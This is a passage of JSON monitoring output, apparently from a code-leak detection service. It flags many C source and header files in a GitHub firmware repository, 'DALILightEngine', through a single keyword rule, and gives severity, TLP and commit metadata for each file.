"2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "37c492846a666c4511e87b6407f3fb5a5937270e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + 
"authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "88db0c983d1e0aa98d07310d4bb70c1459768226", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b95c8fde520d08601f8fddd38de83bf6abc4f83f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 
1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5398f6ff7e98cbade03b5166d242087aff77833c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd040d65a8c08c08ce121270d4ac741645b14fb7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "33132cf183c6c2d7d593577040d5f8e5777be49b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "213b51da637d25746bb472491811fef0ef8d935c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Clock/Clock_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Clock/Clock_cfg.h" + }, + 
{ + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7c443cdceb9086e3f1cf716d02794a45a67f1b02", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd6ca30c612ca05a6e7d9b13232556c00de7c26e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": 
"2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6abedf3686154dc38645a8684b583ca60507cd58", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9faaa09c66f30e5f8152cc8142e46f4f363674fe", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + 
"credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1660a3a0d54f87d81ac1954a973094f2bc7650d8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a34daf04ea14f458669b574adebca4aec372190", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 
+ }, + "id": "a5a4e9c25a1557bbccd2d764c0ab249138e1e783", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "27a206a9b095390b360bea70cd918c197ee897f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "abe4473c1bf22c9e227ae6bb8dfaa1d23d368993", + "matchesType": [ + "keyword" + ], + 
"matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "163dfcc812dc8678176e10647c9d94a29067a657", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "62135fbe72a49fc117ff45c51da465f7904087b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + 
"keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "393a02cf86ae870951f61869f5d4efd18b1febdc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdd0f29caed7ab1114e360ff049883b7e620fc74", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": 
"Source/HALConfig/SystemTick/SystemTick_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4261a01e8d39c506c238f830ae7180dea58d6202", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7abe5053691aa1f16eedd96f8cf9ae708b04b1e5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.h", + "revisions": [ + 
{ + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4f3ff694d8d5c95d1ac697933132d5e708540721", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed39279d060073536367f1b65876ace34b4ea55b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + 
"data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "263a023e5d8ccf8f7a51ebccdab85789e54b36b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a90d7771125101ec8b7945af1cb3bc6893422415", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, 
+ "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6125166b747f04d722a1dff9f33b3f8c0ed5e464", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f6d88cf41619077e82aa8f4ee1b14f8f574d3c14", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + 
"type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed65c6fc60f553d1e615aaae88c703bdd2c88018", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2fddb61d4c3819547e5b75f47d0d25fa6dc7ed9", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "752909a54ba4a307cfc378fd5d684f8844350a4b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + 